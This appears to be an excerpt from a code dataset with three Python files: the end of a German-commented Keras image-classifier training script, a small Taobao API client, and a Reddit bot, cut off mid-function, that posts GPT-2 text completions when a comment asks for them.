Schicht wieder herstellen (so wie sie im Original Netz auch wäre)\n out = keras.layers.GlobalAveragePooling2D()(out)\n elif net_type.lower() in [\"inception-pawara\", \"inceptionv3-pawara\", \"ip\"]:\n net_type = \"IP\"\n # Erste und letzte Schicht weglassen (include_top=False) und eigene Input-Shape\n model = keras.applications.inception_v3.InceptionV3(weights=weights, include_top=False,\n input_shape=(img_size, img_size, 3))\n\n # Letzte Schichten ändern wie im Code von Pawara et al.\n x = model.output\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Activation('relu')(x)\n x = keras.layers.AveragePooling2D(pool_size=(8, 8))(x)\n x = keras.layers.Dropout(0.4)(x)\n out = keras.layers.Flatten()(x)\n elif net_type.lower() in [\"inception\", \"inceptionv3\", \"i\"]:\n net_type = \"I\"\n\n # Erste und letzte Schicht weglassen (include_top=False) und eigene Input-Shape\n model = keras.applications.inception_v3.InceptionV3(weights=weights, include_top=False,\n input_shape=(img_size, img_size, 3))\n out = model.output\n # vorletzte Schicht wieder herstellen (so wie sie im Original Netz auch wäre)\n out = keras.layers.GlobalAveragePooling2D()(out)\n\n else:\n print(\"Netz %s wird nicht unterstützt\" % net_type)\n exit(11)\n # Verzeichnis um alles zu diesem Modell zu speichern\n current_model_string = dataset + \",\" + str(img_size) + \",\" + (\n \"OvO\" if is_ovo else \"OvA\") + \",\" + net_type + \",\" + (\"F\" if is_finetune else \"S\") + \",\" + str(\n train_percent) + \",\" + str(epochs) + \",\" + str(fold) + \",\" + str(extra_info)\n\n # mehrere Folds zum gleichen Netz zusammenfassen in Unterordner\n current_model_folder_name = extra_info + \",\" + dataset + \",\" + str(img_size) + \",\" + (\n \"OvO\" if is_ovo else \"OvA\") + \",\" + net_type + \",\" + (\"F\" if is_finetune else \"S\") + \",\" + str(\n train_percent) + \",\" + str(epochs)\n save_dir = _WORK_DIR / \"saved_results\" / current_model_folder_name.replace(\",\", \"_\").replace(\".\", \",\") / str(fold)\n save_dir_cp = _WORK_DIR / \"saved_checkpoints\"\n cp_name = str(extra_info) + \",\" + current_model_string + \".cp\"\n\n if save_dir.exists():\n print(\"Der Ordner für die aktuelle Konfiguration existiert bereits!\")\n print(str(save_dir))\n exit(13)\n save_dir.mkdir(parents=True)\n save_dir_cp.mkdir(parents=True, exist_ok=True)\n optimizer = keras.optimizers.Adam(lr=get_learning_rate(0))\n\n # Datensatz laden\n x_train, y_train, x_test, y_test = load_dataset(dataset, fold, train_percent, is_ovo, img_size)\n\n steps_per_epoch = x_train.__len__() // _BATCH_SIZE if x_train.__len__() // _BATCH_SIZE > 0 else 1\n\n # Data Augmentation (bis zu 10% shiften vertikal und horizontal, horizontal spiegeln)\n if _DATA_AUGMENTATION:\n data_augmentation = keras.preprocessing.image.ImageDataGenerator(\n featurewise_center=False,\n samplewise_center=False,\n featurewise_std_normalization=False,\n samplewise_std_normalization=False,\n zca_whitening=False,\n rotation_range=0,\n width_shift_range=0.1,\n height_shift_range=0.1,\n horizontal_flip=True,\n vertical_flip=False)\n data_augmentation.fit(x_train)\n\n if is_ovo:\n # Y-Label müssen von Klassennummer (z.B. 5) zu OvO-Vektor kodiert werden\n get_ovo_matrix(num_classes) # speichert OvO-Matrix für passende Klassenanzahl in globale Variable _OVO_MATRIX\n y_train = convert_labels_to_ovo(y_train, num_classes)\n y_test = convert_labels_to_ovo(y_test, num_classes)\n\n output_layer_size = (num_classes * (num_classes - 1)) // 2\n # Modell für OvO vorbereiten (tanh() als letzte Schicht im Netz einfügen)\n output_layer = keras.layers.Dense(output_layer_size, kernel_initializer=\"he_normal\", activation=\"tanh\")(out)\n model = keras.models.Model(inputs=model.inputs, outputs=output_layer)\n model.compile(loss=ovo_crossentropy_loss, optimizer=optimizer,\n metrics=[ovo_crossentropy_loss, ovo_accuracy_metric])\n else: # OvA\n output_layer_size = num_classes\n # Softmax Schicht am Ende des Netzes einfügen für OvA\n output_layer = keras.layers.Dense(output_layer_size, kernel_initializer=\"he_normal\", activation=\"softmax\")(\n out)\n model = keras.models.Model(inputs=model.inputs, outputs=output_layer)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer,\n metrics=['accuracy', \"categorical_crossentropy\"])\n\n checkpoint = keras.callbacks.ModelCheckpoint(filepath=str(save_dir_cp / cp_name), monitor=\"val_loss\",\n verbose=1,\n save_best_only=True)\n callbacks = [checkpoint, keras.callbacks.LearningRateScheduler(get_learning_rate)]\n\n model.summary()\n # Trainiere Netz (mit oder ohne Data-Augmentation)\n if _DATA_AUGMENTATION:\n history = model.fit_generator(data_augmentation.flow(x_train, y_train, batch_size=_BATCH_SIZE),\n validation_data=(x_test, y_test),\n epochs=epochs, shuffle=True, workers=1, verbose=1,\n steps_per_epoch=steps_per_epoch,\n callbacks=callbacks) # TODO workers=4 in Pawara, thread safe warning\n else:\n history = model.fit(x=x_train, y=y_train, batch_size=_BATCH_SIZE,\n validation_data=(x_test, y_test),\n epochs=epochs, shuffle=True, workers=1, verbose=1,\n steps_per_epoch=steps_per_epoch,\n callbacks=callbacks) # TODO workers=4 in Pawara, thread safe warning\n end = datetime.now()\n elapsed = (end - start).total_seconds() / 60 # benötigte Zeit für das Training (und Laden des Datensatzes)\n\n # Speichere die history als pickle-Datei\n with open(save_dir / \"historySave.dat\", 'wb') as pickle_file:\n pickle.dump(history.history, pickle_file)\n\n # Acc und Loss für Test und Train ausrechnen\n acc_test, loss_test = evaluate_model(model, x_test, y_test, is_ovo, save_dir, \"test\")\n acc_train, loss_train = evaluate_model(model, x_train, y_train, is_ovo, save_dir, \"train\")\n # Ergebnis in Logdatei schreiben\n with open(save_dir.parent.parent / \"allModelsLog.txt\", \"a+\") as log_file:\n log_string = \"%s,%.2f,%s,%s,\" % (\n get_gpu_name(), elapsed, _BATCH_SIZE, learning_rate) + current_model_string + \",\" + str(\n loss_train) + \",\" + str(acc_train) + \",\" + str(loss_test) + \",\" + str(acc_test)\n log_file.write(log_string + \"\\n\")\n print(log_string)\n print(\"Finale Accuracy (Train): \" + str(acc_train))\n print(\"Finaler Loss (Train): \" + str(loss_train))\n print(\"Finale Accuracy (Test): \" + str(acc_test))\n print(\"Finaler Loss (Test): \" + str(loss_test))\n\n\ndef str2bool(s: str):\n \"\"\"Konvertiert einen String in einen Boolean\"\"\"\n\n if s.lower() in [\"true\", \"yes\", \"1\"]:\n return True\n elif s.lower() in [\"false\", \"no\", \"0\"]:\n return False\n else:\n print(\"Fehler: Boolean erwartet! %s ist nicht als Boolean interpretierbar\" % s)\n exit(1)\n\n\ndef parse_arguments():\n p = argparse.ArgumentParser(description=\"Training mit übergebenen Parametern\")\n p.add_argument(\"--dataset\", type=str, help=\"Name des Datensatzes in \" + str(_DATASET_DIR))\n p.add_argument(\"--fold\", type=str, help=\"Name des Foldes (z.B. \\\"exp1\\\")\")\n p.add_argument(\"--img_size\", type=int, help=\"Größe des Bildes in Pixeln\")\n p.add_argument(\"--is_ovo\", type=str2bool, help=\"True für OvO Ansatz\")\n p.add_argument(\"--net_type\", type=str, help=\"Name des Netzes (resnet, inception-pawara oder inception)\")\n p.add_argument(\"--epochs\", type=int, help=\"Anzahl an zu trainierenden Epochen\")\n p.add_argument(\"--is_finetune\", type=str2bool,\n help=\"True für finetuning des Netzes, False für scratch-training\")\n p.add_argument(\"--train_percent\", type=int, help=\"Prozentsatz des zu verwendenden Train-Splits\")\n p.add_argument(\"--learning_rate\", type=float,\n help=\"Initiale Learning-Rate (z.B. 0.001 oder 0.0001)\")\n p.add_argument(\"--extra_info\", type=str, help=\"Kommentar / Markierung für Ergebnisse im\"\n \"CSV-Log (z.B. verwendete TF Version)\")\n args = p.parse_args()\n\n # Prüfe ob alle Argumente angegeben wurden\n if args.dataset is None:\n print(\"Parameter --dataset wird benötigt!\")\n exit(2)\n if args.fold is None:\n print(\"Parameter --fold wird benötigt!\")\n exit(3)\n if args.img_size is None:\n print(\"Parameter --img_size wird benötigt!\")\n exit(4)\n if args.is_ovo is None:\n print(\"Parameter --is_ovo wird benötigt!\")\n exit(5)\n if args.net_type is None:\n print(\"Parameter --net_type wird benötigt!\")\n exit(6)\n if args.epochs is None:\n print(\"Parameter --epochs wird benötigt!\")\n exit(7)\n if args.is_finetune is None:\n print(\"Parameter --is_finetune wird benötigt!\")\n exit(8)\n if args.train_percent is None:\n print(\"Parameter --train_percent wird benötigt!\")\n exit(9)\n if args.learning_rate is None:\n print(\"Parameter --learning_rate wird benötigt!\")\n exit(10)\n if args.extra_info is None:\n extra_info = \"\"\n else:\n extra_info = args.extra_info\n\n # Trainiere mit angegebenen Parametern\n train(dataset=args.dataset, fold=args.fold, img_size=args.img_size, is_ovo=args.is_ovo, net_type=args.net_type,\n epochs=args.epochs, is_finetune=args.is_finetune, train_percent=args.train_percent,\n learning_rate=args.learning_rate, extra_info=extra_info)\n\n\ndef get_gpu_name():\n # Workaround für Modulfehler, s. Imports\n devices = tfclient.device_lib.list_local_devices()\n for device in devices:\n if device.device_type == \"GPU\":\n device_string = device.physical_device_desc.split(\",\")[1].replace(\"name:\", \"\").strip()\n return device_string\n\n\nif __name__ == \"__main__\":\n parse_arguments()\n", "sub_path": "Code/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 24049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.zeros_like", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.__version__", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.log", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.math", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.single", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.tensordot", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.tensordot", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.backend.argmax", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 74, "usage_type": "attribute"}, {"api_name": "keras.backend.argmax", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 75, "usage_type": "attribute"}, {"api_name": "keras.backend.equal", "line_number": 77, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 77, "usage_type": "attribute"}, {"api_name": "keras.backend.mean", "line_number": 78, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils.data_utils.image_preloader", "line_number": 94, "usage_type": "call"}, {"api_name": "tflearn.data_utils.data_utils", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils", "line_number": 94, "usage_type": "name"}, {"api_name": "tflearn.data_utils.data_utils.image_preloader", "line_number": 96, "usage_type": "call"}, {"api_name": "tflearn.data_utils.data_utils", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 136, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.set_printoptions", "line_number": 197, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 208, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 211, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 211, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 225, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 234, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 234, "usage_type": "name"}, {"api_name": "keras.applications.resnet50.ResNet50", "line_number": 271, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 271, "usage_type": "attribute"}, {"api_name": "keras.layers.GlobalAveragePooling2D", "line_number": 275, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 275, "usage_type": "attribute"}, {"api_name": "keras.applications.inception_v3.InceptionV3", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 279, "usage_type": "attribute"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 284, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 284, "usage_type": "attribute"}, {"api_name": "keras.layers.Activation", "line_number": 285, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 285, "usage_type": "attribute"}, {"api_name": "keras.layers.AveragePooling2D", "line_number": 286, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 286, "usage_type": "attribute"}, {"api_name": "keras.layers.Dropout", "line_number": 287, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 287, "usage_type": "attribute"}, {"api_name": "keras.layers.Flatten", "line_number": 288, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 288, "usage_type": "attribute"}, {"api_name": "keras.applications.inception_v3.InceptionV3", "line_number": 293, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 293, "usage_type": "attribute"}, {"api_name": "keras.layers.GlobalAveragePooling2D", "line_number": 297, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 297, "usage_type": "attribute"}, {"api_name": "keras.optimizers.Adam", "line_number": 321, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 321, "usage_type": "attribute"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 330, "usage_type": "call"}, {"api_name": "keras.preprocessing", "line_number": 330, "usage_type": "attribute"}, {"api_name": "keras.layers.Dense", "line_number": 351, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 351, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 352, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 352, "usage_type": "attribute"}, {"api_name": "keras.layers.Dense", "line_number": 358, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 358, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 360, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 360, "usage_type": "attribute"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 364, "usage_type": "call"}, {"api_name": "keras.callbacks", "line_number": 364, "usage_type": "attribute"}, {"api_name": "keras.callbacks.LearningRateScheduler", "line_number": 367, "usage_type": "call"}, {"api_name": "keras.callbacks", "line_number": 367, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 383, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 383, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 388, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 419, "usage_type": "call"}, {"api_name": "tensorflow.python.client.device_lib.list_local_devices", "line_number": 476, "usage_type": "call"}, {"api_name": "tensorflow.python.client.device_lib", "line_number": 476, "usage_type": "attribute"}, {"api_name": "tensorflow.python.client", "line_number": 476, "usage_type": "name"}]} +{"seq_id": "351001396", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\ntaobao simple sdk\nauthor:stone\nemail:thisisbaozi@gmail.com\n'''\n\nimport json\nimport hashlib\nfrom urllib import urlencode\nfrom httplib import HTTPConnection\nfrom time import time\n\n_HTTP_GET_REQUEST = 'GET'\n_HTTP_POST_REQUEST = 'POST'\n\n\n'''taoabo top paramter alias'''\n_TAOBAO_P_SIGN = 'sign'\n_TAOBAO_P_SIGN_METHOD = 'sign_method'\n_TAOBAO_P_APPKEY = 'app_key'\n_TAOBAO_P_API = 'method'\n_TAOBAO_P_SESSION = 'session'\n_TAOBAO_P_VERSION = 'v'\n_TAOBAO_P_ACCESS_TOKEN = 'access_token'\n_TAOBAO_P_FORMAT = 'format'\n_TAOBAO_P_TIMESTAMP = 'timestamp'\n_TAOBAO_P_PARTNER_ID = 'partner_id'\n_TAOBAO_P_SDK_VERSION = 'taobao-sdk-python-20121002'\n\n\n'''default config'''\n_DEFAULT_TAOBAO_TOP_REST = '/router/rest'\n_DEFAULT_TAOBAO_TOP_URL = 'gw.api.taobao.com'\n_DEFAULT_TAOBAO_TOP_PORT = 80\n_DEFAULT_TAOBAO_TOP_TIMEOUT = 30\n\nclass SdkException(Exception):\n\t'''sdk exception'''\n\tpass\n\nclass RequestException(Exception):\n\t'''http request exception'''\n\tpass\n\nclass Sign(object):\n\t'''generate sign'''\n\t_sign = None\n\n\tdef __init__(self, app_key, app_serect, app_session, app_func, func_param):\n\t\tsystem_params = {\n\t\t\t_TAOBAO_P_FORMAT : 'json',\n\t\t\t_TAOBAO_P_APPKEY : app_key,\n\t\t\t_TAOBAO_P_SIGN_METHOD : 'md5',\n\t\t\t_TAOBAO_P_VERSION : '2.0',\n\t\t\t_TAOBAO_P_TIMESTAMP : str(long(time() * 1000)),\n\t\t\t_TAOBAO_P_PARTNER_ID : _TAOBAO_P_SDK_VERSION,\n\t\t\t_TAOBAO_P_API : app_func.replace('_', '.')\n\t\t}\n\n\t\tif app_session:\n\t\t\tsystem_params[_TAOBAO_P_SESSION] = app_session\n\t\tsign_params = system_params.copy()\n\t\tsign_params.update(func_param)\n\n\t\tkeys = sign_params.keys()\n\t\tkeys.sort()\n\t\tparams = '%s%s%s' % (app_serect, str().join('%s%s' % (key, sign_params[key]) for key in keys), app_serect)\n\t\tsystem_params[_TAOBAO_P_SIGN] = hashlib.md5(params).hexdigest().upper()\n\t\tself._sign = system_params\n\n\tdef generate_url(self):\n\t\treturn '%s?%s' % (_DEFAULT_TAOBAO_TOP_REST, urlencode(self._sign))\n\n\nclass HttpRequest(object):\n\t'''http request '''\n\tdef __init__(self, taobao_topclient, method):\n\t\tself.client = taobao_topclient\n\t\tself.method = method\n\n\n\tdef __getattr__(self, func):\n\t\tdef wrap(**func_param):\n\t\t\tsign = Sign(app_serect = self.client.app_serect, app_key = self.client.app_key, app_session = self.client.app_session, app_func = func, func_param = func_param)\n\t\t\trequest_url = sign.generate_url()\n\t\t\trequest_body = urlencode(func_param)\n\t\t\trequest_header = {\n\t\t\t\t'Content-type' : 'application/x-www-form-urlencoded',\n\t\t\t\t'Cache-Control' : 'no-cache',\n\t\t\t\t'Connection' : 'Keep-Alive'\n\t\t\t}\n\t\t\n\t\t\treturn self.client.get_response(self.method, request_url, request_body, request_header)\t\n\t\treturn wrap\n\nclass TaobaoSdkClient(object):\n\t'''taobao sdk '''\n\n\tdef __init__(self, app_key, app_serect, app_session = None, domain = None, port = None):\n\t\tself.app_key = app_key\n\t\tself.app_serect = app_serect\n\t\tself.app_session = app_session\n\t\tself.domain = domain or _DEFAULT_TAOBAO_TOP_URL\n\t\tself.port = port or _DEFAULT_TAOBAO_TOP_PORT\n\n\t\tself.get = HttpRequest(self, _HTTP_GET_REQUEST)\n\t\tself.post = HttpRequest(self, _HTTP_POST_REQUEST)\n\n\tdef get_response(self, http_method, request_url, request_body, request_header):\n\t\thttp_connection = HTTPConnection(self.domain, self.port, _DEFAULT_TAOBAO_TOP_TIMEOUT)\n\t\thttp_connection.connect()\n\t\thttp_connection.request(http_method, request_url, body = request_body, headers = request_header)\n\t\thttp_response = http_connection.getresponse()\n\n\t\tif http_response.status is not 200:\n\t\t\traise RequestException('invalid http status ' + str(http_connection.status) + ', detail body :' + http_response.read())\n\t\thttp_request_data = http_response.read()\n\n\t\tjson_data_obj = json.loads(http_request_data)\n\t\tif 'error_response' in json_data_obj:\n\t\t\t#todo 详细的错误\n\t\t\treturn json_data_obj\n\n\t\treturn json_data_obj\n\n\n\n", "sub_path": "taobao.py", "file_name": "taobao.py", "file_ext": "py", "file_size_in_byte": 3755, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 70, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 74, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 88, "usage_type": "call"}, {"api_name": "httplib.HTTPConnection", "line_number": 112, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "390888596", "text": "#!/usr/bin/python\nimport sys\nimport praw\nimport re\nimport random\nimport os\nimport pbd\nimport string\nimport time\nimport functools\nfrom joblib import Parallel, delayed, parallel_backend\nfrom threading import Lock\nimport tqdm\nimport fire\nimport json\nimport tensorflow as tf\nimport numpy as np\nimport pexpect\n\nimport model, sample, encoder\n\ndef clean_input(s):\n return ''.join(filter(lambda x: x in set(string.printable), s))\n\nclass StreamList():\n def __init__(self):\n self.stream_file = open(\"/mnt/stream_list.txt\", 'r+')\n self.list = self._load()\n\n def __del__(self):\n self.stream_file.close()\n\n def _load(self):\n out = []\n for line in self.stream_file:\n out.append(line.strip())\n print(\"loaded subms\", out)\n return out\n\n def append(self, data):\n self.stream_file.write(str(data)+\"\\n\")\n self.stream_file.flush()\n self.list.append(data)\n\nclass GPT2Bot():\n def __init__(self, log):\n self.log = log\n self.lock = Lock()\n self.stream_guy = False\n self.t_man = False\n self.reddit = praw.Reddit('gptbot')\n self.rexp = re.compile(r\"^(.*)gpt-2(.*)finish this(.*)$\", re.IGNORECASE|re.DOTALL)\n self.name = self.reddit.user.me().name\n self.stream_list = StreamList()\n self.key_word = \"gpt-2\"\n self.output = None\n self.callback = None\n self.sample = None\n \n def run_loop(self):\n while True:\n try:\n self.run_mt(32)\n except KeyboardInterrupt:\n self.log(\"\\nUser pressed ctrl-c...\")\n break\n\n def get_response(self, input_str):\n sample = str(\"\\n======================================== SAMPLE 1 ======================================== I'm having some trouble understanding you. Make sure you don't have any special characters in your prompt.\").encode('utf-8')\n\n attempts = 0\n while attempts < 5:\n try:\n child = pexpect.spawn('python src/interactive_conditional_samples.py --top_k 40')\n child.expect('Model prompt >>> ')\n child.sendline(clean_input(input_str))\n child.expect('================================================================================')\n sample = child.before[len(input_str):]\n break\n except pexpect.exceptions.EOF:\n child.kill(0)\n attempts += 1\n print(\"Attempt \", attempts, \"failed. Trying again.\")\n return sample.decode()\n\n def clean_response(self, resp, inp, user=None):\n resp = str(resp[92:]).encode('utf-8')\n resp = resp.split('<|endoftext|>'.encode('utf-8'))[0]\n sp = resp.splitlines()\n self.log(\"Split len\", len(sp))\n out = \"\"\n\n ctr = 0\n lp = len(sp)\n stop = False\n pref = \"**OUTPUT\"\n if user is not None:\n pref += \" (courtesy of u/\" + user.name + \"):**\"\n else:\n pref += \"**\"\n iop = \"\\n\"\n for iline in inp.splitlines():\n iop += \"> **\" + iline.strip() + \"** \\n\"\n while ctr < len(sp):\n if len(sp[0]) > 0 and ord('=') in sp[0][:min(2, len(sp[0]))] and not stop:\n stop = True\n del sp[0]\n if len(sp) < 1 or ctr == (lp-1):\n break\n lp = len(sp)\n out += \"> \" + sp[ctr].decode() + \"\\n\"\n ctr += 1\n if len(out) > len(inp):\n break\n return str(pref + iop + \"\\n\" + out + \"\\nBeep boop, I'm a bot.\")\n\n def message_guy(self):\n self.log(\"MESSAGE GUY STARTING\\n\")\n for message in self.reddit.inbox.unread(limit=None):\n if isinstance(message, praw.models.Message):\n self.log(\"Found a DM!\\n\", silent=True)\n cb = \"\"\n for line in message.body.splitlines():\n if line.strip():\n insensitive_hippo = re.compile(re.escape('**INPUT(.*):**'), re.IGNORECASE)\n insensitive_d = re.compile(re.escape(\"Beep boop, I'm a bot.\"), re.IGNORECASE)\n cb += str(insensitive_hippo.sub('', str(insensitive_d.sub('', line))))\n cb = clean_input(cb)\n\n if len(cb.strip()) < 2:\n self.log(\"Parent comment was empty\", silent=True)\n continue\n\n self.lock.acquire()\n response = self.clean_response(self.get_response(cb), cb)\n self.log(\"Bot replying to direct message: \"+cb)\n self.log(\"Response : \"+response+\"\\n------------------------------------------------\")\n self.lock.release()\n try:\n if not response:\n self.log(\"Response was empty\")\n continue\n message.reply(response)\n message.mark_read()\n except:\n self.log(\"An error occured while replying\")\n \n\n def run(self, n_threads, subm):\n def do_work(self, comment):\n if not isinstance(comment, praw.models.Comment):\n return\n if comment.author is None or comment.author.name == self.name:\n return\n if self.rexp.match(clean_input(comment.body)) is None:\n return\n for h in comment.replies:\n if h.author.name == self.name:\n return\n try:\n cp = comment.parent()\n\n if isinstance(cp, praw.models.Submission):\n self.log(\"Parent was a submission...\\n\", silent=True)\n return\n else:\n for h in cp.replies:\n if h.author is None:\n continue\n if h.author.name == self.name:\n self.log(\"Already replied to this comment...\\n\", silent=True)\n return\n except:\n self.log(\"Unknown error occured\")\n return\n self.log(\"Found one!\")\n cb = \"\"\n for line in cp.body.splitlines():\n if line.strip():\n insensitive_hippo = re.compile(re.escape('**INPUT(.*):**'), re.IGNORECASE)\n insensitive_d = re.compile(re.escape(\"Beep boop, I'm a bot.\"), re.IGNORECASE)\n cb += str(insensitive_hippo.sub('', str(insensitive_d.sub('', line))))\n cb = clean_input(cb)\n cpl = \"https://www.reddit.com\" + cp.permalink\n\n if len(cb.strip()) < 2:\n self.log(\"Parent comment was empty\")\n return\n elif cb.strip() == \"[removed]\":\n self.log(\"Parent comment was removed\")\n return\n\n self.lock.acquire()\n response = self.clean_response(self.get_response(cb), cb, comment.author)\n self.log(\"Bot replying to : \"+cb+\"\\nURL : \"+cpl)\n self.log(\"Response : \"+response+\"\\n------------------------------------------------\")\n self.lock.release()\n try:\n if not response:\n self.log(\"Response was empty\")\n return\n cp.reply(response)\n except:\n self.log(\"An error occured while replying\")\n return\n\n self.log(\"Starting Submission Run... \"+str(time.time()))\n submission = praw.models.Submission(self.reddit, id=subm)\n submission.comments.replace_more(limit=None)\n with parallel_backend('threading', n_jobs=n_threads):\n Parallel()(delayed(do_work)(self, comment) for comment in tqdm.tqdm(submission.comments.list()) if comment is not None)\n self.log(\"SUBMISSION RUN DONE!!!\\n\\n============================================================\\n\", flush=True)\n\n def should_add_to_list(self, subm):\n if self.key_word in subm.title.lower():\n self.lock.acquire()\n self.log(\"\\nFound a new submission about \"+self.key_word+\"\\nURL: \"+subm.permalink)\n self.stream_list.append(subm.id)\n self.lock.release()\n\n def run_mt(self, n_threads):\n def do_work(self, comment):\n if not self.t_man:\n self.t_man = True\n self.lock.acquire()\n self.log(\"\\n================ RUNNING SUBMISSION SWEEP ================\\n\\n\")\n self.lock.release()\n with parallel_backend('threading', n_jobs=4):\n Parallel()(delayed(self.run)(16, subm) for subm in tqdm.tqdm(self.stream_list.list))\n self.message_guy()\n time.sleep(900)\n self.t_man = False\n elif not self.stream_guy:\n self.stream_guy = True\n self.lock.acquire()\n self.log(\"\\n================ RUNNING SUBMISSION STREAM ================\\n\\n\")\n self.lock.release()\n all = self.reddit.subreddit('all')\n with parallel_backend('threading', n_jobs=4):\n Parallel()(delayed(self.should_add_to_list)(submission) for submission in tqdm.tqdm(all.stream.submissions(skip_existing=True)))\n\n if not isinstance(comment, praw.models.Comment):\n return\n if comment.author is None or comment.author.name == self.name:\n return\n if self.rexp.match(clean_input(comment.body)) is None:\n return\n for h in comment.replies:\n if h.author.name == self.name:\n return\n self.log(\"Found one!\")\n\n try:\n cp = comment.parent()\n\n if isinstance(cp, praw.models.Submission):\n self.log(\"Parent was a submission...\\n\")\n return\n else:\n for h in cp.replies:\n if h.author is None:\n continue\n if h.author.name == self.name:\n self.log(\"Already replied to this comment...\\n\")\n return\n except:\n self.log(\"An unknown error occured.\\n\")\n return\n\n cb = \"\"\n for line in cp.body.splitlines():\n if line.strip():\n insensitive_hippo = re.compile(re.escape('**OUTPUT(.*):**'), re.IGNORECASE)\n insensitive_s = re.compile(re.escape('> '))\n insensitive_d = re.compile(re.escape(\"Beep boop, I'm a bot.\"), re.IGNORECASE)\n cb += str(insensitive_hippo.sub('', str(insensitive_d.sub('', str(insensitive_s.sub('', line.strip())))))) + \"\\n\"\n cb = clean_input(cb)\n cpl = \"https://www.reddit.com\" + cp.permalink\n\n if len(cb.strip()) < 1:\n self.log(\"Parent comment was empty\")\n return\n elif cb.strip() == \"[removed]\":\n self.log(\"Parent comment was removed\")\n return\n\n self.lock.acquire()\n if comment.subreddit.name == \"politics\":\n response = self.clean_response(self.get_response(cb), cb)\n else:\n response = self.clean_response(self.get_response(cb), cb, comment.author)\n self.log(\"Bot replying to : \"+cb+\"\\nURL : \"+cpl)\n self.log(\"Response : \"+response+\"\\n------------------------------------------------\")\n self.lock.release()\n try:\n if not response:\n self.log(\"Response was empty\")\n return\n cp.reply(response)\n except:\n 